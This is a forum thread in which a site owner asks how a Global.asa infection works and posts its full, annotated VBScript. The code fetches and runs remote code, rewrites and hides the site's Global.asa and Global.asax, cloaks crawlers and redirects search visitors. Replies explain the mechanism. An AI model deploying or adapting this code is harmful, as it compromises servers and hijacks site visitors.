关于这个Global.asa病毒的原理到底是什么?

wuxia2118 2012-06-24 09:16:04
(1)百度收录网站时,为什么收录的网址自动有查询字符串:gjs.hnnu.cn/?key=cqmf
(2)为什么从百度点击进入时,可同时打开病毒设置的网页。

代码如下:Global.asa

<script language="vbscript" runat="server">

' Application_OnStart: deliberately left empty; the implant hooks Session_OnStart
' instead so the download-and-execute step repeats for every new visitor session.
sub Application_OnStart
end sub
' Application_OnEnd: empty; nothing is cleaned up on application shutdown.
sub Application_OnEnd
end sub
' Session_OnStart fires once for every new ASP session, so each first visit to the
' site downloads the remote payload again and runs it server-side.  This is the
' persistence/remote-code-execution hook of the infection: whatever the remote
' host returns (when it carries the "by*vb" marker) becomes part of the application.
' On Error Resume Next swallows every failure (DNS, COM object missing, parse
' error), so a broken fetch leaves no visible symptom and no error log entry.
' Defender note: an outbound HTTP request from the IIS worker process to the host
' below on each new session is the network-level indicator of this code.
sub Session_OnStart
On Error Resume Next
' Remote stage-2.  The .gif extension is cosmetic; the body is treated as VBScript.
url="http://www.520rtys.info/520rtys/global.asaquan.gif"
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
' The User-Agent is set to the URL string itself; presumably a marker that lets the
' remote host distinguish implant fetches from browser requests - not verifiable here.
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
' responseBody is a byte array; the ADODB.Stream below re-reads it as gb2312 text.
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1          ' adTypeBinary: accept the raw bytes
objStream.Mode =3           ' adModeReadWrite
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2          ' adTypeText: switch to text for ReadText
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
set objStream=Nothing
' "by*vb" is the author's marker; a response without it is silently ignored.
' execute compiles and runs the downloaded text as VBScript in this scope, with
' On Error Resume Next still active, so the payload's own errors are hidden too.
if instr(GetHtml,"by*vb")>0 then
execute GetHtml
end if
end sub

</script>
调用的http://www.520rtys.info/520rtys/global.asaquan.gif文件内容:

' The two lines below start with ' so VBScript's execute treats them as comments,
' while a browser opening the same URL sees an HTML page whose script blanks itself
' and navigates to about:blank.  Together with the trailing '</body></html> at the
' end of the payload this makes the file look harmless when fetched manually.
'<html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title="";document.body.innerHTML=Source;}</script></head><body onload=clear()>
'<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>

' 600 s script timeout: the payload performs up to four synchronous remote fetches
' per request (see GetHtml calls below) and must not be killed by the default limit.
Server.ScriptTimeout=600
' createasa overwrites the site's /Global.asa with Content and hides the result.
' Content: VBScript text fetched from the remote host (see the caller below).
' Returns nothing meaningful; every error is swallowed by On Error Resume Next.
' Defender note: a Global.asa carrying the ReadOnly+Hidden+System attributes set
' here is a strong on-disk indicator of this infection.
Public Function createasa(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
' "//./" prefix appears to be the Win32 device-namespace form (\\.\) with forward
' slashes; possibly meant to sidestep path checks - not verifiable from here.
set f=fso.Getfile("//./" & Server.MapPath("/Global.asa"))
' Clear ReadOnly/Hidden/System first so the overwrite below is allowed.
f.Attributes=0
' The ProgID is split into fragments, presumably to defeat string-based scanners
' looking for "adodb.stream".
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2                ' adTypeText
Obj.open
Obj.Charset = "gb2312"
' The stream was just opened and is empty, so Size is 0 and this is position 0.
Obj.Position = Obj.Size
' Assignment form of WriteText; if it fails the error is hidden by Resume Next.
Obj.writetext = Content
' Mode 2 = adSaveCreateOverWrite: the existing Global.asa is replaced, not appended.
Obj.SaveToFile "//./" & Server.MapPath("/Global.asa"),2
Obj.Close
Set Obj = Nothing
' 1+2+4 = ReadOnly + Hidden + System: hides the file from a casual directory listing.
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End Function

' createasax is the same routine as createasa but targets /Global.asax, the
' ASP.NET counterpart of Global.asa, so the infection also covers sites that run
' ASP.NET on the same root.  Content: text fetched from the remote host.
Public Function createasax(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/Global.asax"))
' Drop ReadOnly/Hidden/System so the file can be replaced.
f.Attributes=0
' Split ProgID for "adodb.stream", same evasion as in createasa.
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2                ' adTypeText
Obj.open
Obj.Charset = "gb2312"
Obj.Position = Obj.Size
Obj.writetext = Content
' 2 = adSaveCreateOverWrite: full replacement of Global.asax.
Obj.SaveToFile "//./" & Server.MapPath("/Global.asax"),2
Obj.Close
Set Obj = Nothing
' ReadOnly + Hidden + System.
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End Function

' Self-update step: on every new session the current Global.asa / Global.asax
' bodies are re-fetched and rewritten if they carry the "by*vb" marker.  This
' is why removing the file by hand does not help while the hook is still loaded
' in the running application - the next session restores it.
' GetHtml is defined further down in this same executed text; presumably the
' whole payload is parsed before it runs, so the forward reference resolves.
asa=GetHtml("http://www.520rtys.info/520rtys/globalquan.gif")
if instr(asa,"by*vb")>0 then
createasa(asa)
end if

asax=GetHtml("http://www.520rtys.info/520rtys/globalquanasax.gif")
if instr(asax,"by*vb")>0 then
createasax(asax)
end if

' GetHtml performs a synchronous GET of url and returns the body decoded as gb2312.
' Same download logic as Session_OnStart in the dropper, minus the marker check.
' url: absolute URL (every caller in this payload passes an attacker-controlled host).
' Returns: the response body as a string.  There is no local error handling; any
' failure surfaces to the caller (or is hidden by an enclosing On Error Resume Next).
Public Function GetHtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
' User-Agent set to the requested URL, as in the dropper.
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1          ' adTypeBinary
objStream.Mode =3           ' adModeReadWrite
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2          ' adTypeText
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
' The stream object is closed but never released (no Set objStream = Nothing).
objStream.Close
End Function

' check returns True when user_agent contains any of the listed crawler names.
' user_agent: raw HTTP User-Agent string.
' Used below to decide whether a request gets the cloaked SEO content instead of
' the real page (case-sensitive substring match).
Function check(user_agent)
allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")
check_agent=false
For agenti=lbound(allow_agent) to ubound(allow_agent)
If instr(user_agent,allow_agent(agenti))>0 then
check_agent=true
exit for
end if
Next
check=check_agent
End function

' CheckRobot: True for a Baidu/Google crawler User-Agent, or when the session has
' been flagged via the ?admin=1 query string - a switch that lets the operator see
' the crawler view from a normal browser.  Not called anywhere in the visible
' payload text; kept here, possibly for use by another stage.
' Krobotlist is never Dim'd, which only works without Option Explicit.
Function CheckRobot()
CheckRobot = False
Dim Botlist,i,Repls
Repls = request.ServerVariables("http_user_agent")
Krobotlist = "Baiduspider|Googlebot"
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(Repls,Botlist(i)) > 0 Then
CheckRobot = True
Exit For
End If
Next
' Session-scoped override: once ?admin=1 is sent, every later request in the
' session is treated as a crawler.
If Request.QueryString("admin")= "1" Then Session("ThisCheckRobot")=1
If Session("ThisCheckRobot") = 1 Then CheckRobot = True
End Function
' CheckRefresh: True when the first 40 characters of the HTTP Referer contain the
' name of a search engine, i.e. the visitor arrived by clicking a search result.
' This is the trigger for the redirect in the main flow below and answers the
' original question (2): why search-engine clicks land on the attacker's page.
' Only the first 40 chars are inspected (the "40" string is coerced to a number),
' so the match is effectively on the referring host name.
Function CheckRefresh()
CheckRefresh = False
Dim Botlist,i,Repls
Krobotlist = "baidu|google|sogou|soso|youdao"
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then
CheckRefresh = True
Exit For
End If
Next
End Function
' sleep: despite the name it does not wait.  It flushes the buffered response if
' the client is still connected and otherwise terminates the response.
Sub sleep()
If response.IsClientConnected=true then
Response.Flush
else
response.end
end if
End Sub
' Main request handling.  Because this text is run from Session_OnStart, all of
' it executes at the start of each new session, before the real page.  Three
' paths: (1) search-engine click-through -> redirect to the attacker's site,
' (2) known crawler -> serve remote SEO content (cloaking), (3) everyone else ->
' rate-limited redirect or a fake "file not found" message.
' Path 1: Referer names a search engine.  The victim host is passed in the query
' string so the attacker can track which infected site sent the visitor.
If CheckRefresh=true Then
cnnbd=lcase(request.servervariables("HTTP_HOST"))
response.redirect("http://www.520rtys.info/?"&cnnbd&"")

response.end
end If
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
' Path 2: crawler User-Agent.  The crawler receives attacker-supplied HTML from
' two remote URLs instead of the real page and the response is ended, so the
' search index stores content the site never shows to humans.  This is the
' mechanism behind question (1); the indexed "?key=" URLs presumably come from
' links inside that injected content, which is not visible here.
if check(user_agent)=true then
body=GetHtml("http://3.gench.info/")
response.write body
Dim XmlHttp
Set XmlHttp = Server.CreateObject("MSXML2.ServerXMLHTTP")
XmlHttp.open "GET","http://www.520rtys.info/520rtys/seo.htm",false
XmlHttp.send()
response.write(XmlHttp.responseText)
response.end
else

' Path 3: human visitors.  Rebuild the full requested URL (path + query).
ScriptAddress=Request.ServerVariables("SCRIPT_NAME")
namepath=Server.MapPath(ScriptAddress)
If Len(Request.QueryString) > 0 Then
ScriptAddress = ScriptAddress & "?" & Request.QueryString
end if
geturl ="http://"& Request.ServerVariables("http_host") & ScriptAddress
geturl =LCase(geturl)
'response.write replace(namepath,server.MapPath("/"),"")
'response.end
'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and instr(LCase(Request.ServerVariables("http_host")),"gov.cn")=0 and instr(LCase(Request.ServerVariables("http_host")),"edu.cn")=0 and
' Only act on deep pages (not /index.asp or the site root) reached from an
' external Referer that does not contain the site's own host name.  Note the
' commented-out line above once excluded gov.cn / edu.cn hosts; that filter is
' no longer active.
if instr(geturl,"http://"& Request.ServerVariables("http_host") &"/index.asp")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/")=0 and instr(LCase(Request.ServerVariables("HTTP_REFERER")),LCase(Request.ServerVariables("http_host")))<=0 then
agent = lcase(request.servervariables("http_user_agent"))
referer = LCase(Request.ServerVariables("HTTP_REFERER"))
bot = ""
Amll = ""

' Crude bot heuristics: any of these substrings in the User-Agent makes bot
' non-empty, which later disables the redirect (len(bot) = 0 test below).
if instr(agent, "+") > 0 then bot = agent
if instr(agent, "-") > 0 then bot = agent
if instr(agent, "http") > 0 then bot = agent
if instr(agent, "spider") > 0 then bot = agent
if instr(agent, "bot") > 0 then bot = agent
if instr(agent, "linux") > 0 then bot = agent
if instr(agent, "baidu") > 0 then bot = agent

' These engines get bot = "nobot".  Since len("nobot") is 5, they are excluded
' from the redirect exactly like the agents above; the name is misleading.
if instr(agent, "google") > 0 then bot = "nobot"
if instr(agent, "yahoo") > 0 then bot = "nobot"
if instr(agent, "msn") > 0 then bot = "nobot"
if instr(agent, "alexa") > 0 then bot = "nobot"
if instr(agent, "sogou") > 0 then bot = "nobot"
if instr(agent, "youdao") > 0 then bot = "nobot"
if instr(agent, "soso") > 0 then bot = "nobot"
if instr(agent, "iask") > 0 then bot = "nobot"

' Dead branch: the handling for "nobot" is commented out.
if bot="nobot" then
'Call WriteErr
'response.end
end if

' Amll = "ok" when the Referer looks like a search-result URL (scheme, host,
' path and at least one query parameter).  REFERER is the same variable as
' referer above; VBScript identifiers are case-insensitive.
If Instr(REFERER,"http") > 0 and Instr(REFERER,".") > 0 and Instr(REFERER,"/") > 0 and Instr(REFERER,"?") > 0 and Instr(REFERER,"=") > 0 Then Amll = "ok"

' Per-visitor daily counter kept in two cookies: cookie_tjcount (redirects
' today, 1-day expiry) and cookie_date (the day it was counted for).
tjcount=request.Cookies("cookie_tjcount")
date1=request.Cookies("cookie_date")
date2=year(date)&month(date)&day(date)

if tjcount="" then
response.cookies("cookie_tjcount")=0
response.cookies("cookie_tjcount").Expires=DateAdd("d",1,now())
end if

if date1<>date2 then
response.cookies("cookie_date")=date2
response.cookies("cookie_date").Expires=DateAdd("d",365,now())
end if

' Re-read the request cookies.  Cookies set on the response above are not
' visible in the request, so on a visitor's first hit tjcount is still "" and
' date1 still differs from date2; the redirect can only fire on a later request.
tjcount=request.Cookies("cookie_tjcount")
date1=request.Cookies("cookie_date")
date2=year(date)&month(date)&day(date)

' Redirect only non-bots, at most 10 times per day, and only when the Referer
' looked like a search result.  The victim host is again sent in the query.
if date1=date2 and len(bot) = 0 then
if int(tjcount)<10 and len(Amll)>0 then
response.cookies("cookie_tjcount")=int(tjcount)+1
response.cookies("cookie_tjcount").Expires=DateAdd("d",1,now())
strHost=Request.ServerVariables("HTTP_HOST")
Response.Redirect("http://www.369m.info/?domain="&strHost&"")
else
' Fake error text ("The system cannot find the file specified.") shown once
' the daily quota is used up or the Referer was not a search result - it
' makes the site look broken rather than hijacked.
response.write "系统找不到指定的文件。"
'response.write ""
'response.write gethtml(geturl&"?global=ok")
end if
' Ends the response here, so the real page never renders on this path.
response.end
end if
Call sleep()
end if
end if
' Closing half of the HTML disguise started at the top of the payload.
'</body></html>
hookee 2012-06-24
通过http头的 user-agent可以知道是不是搜索引擎过来的请求;
搜索引擎过来的请求会带查询参数,通过HTTP头Referer可以获得这个参数;
用response.redirect 转到 他的地址;
以上都是由 session_start触发的
-------
程序在 global.asaquan.gif中,通过XMLHTTP获取后 用Stream文本方式读取它,然后用vbs的execute执行其中的代码;
-------
不管如何,网站中应该是有上传漏洞,改写了global.asa文件了

wuxia2118 2012-06-24
而且这个代码能劫持Session,导致后台登陆不进,提示Session超时,我怀疑是病毒创建的Session覆盖了登录的Session
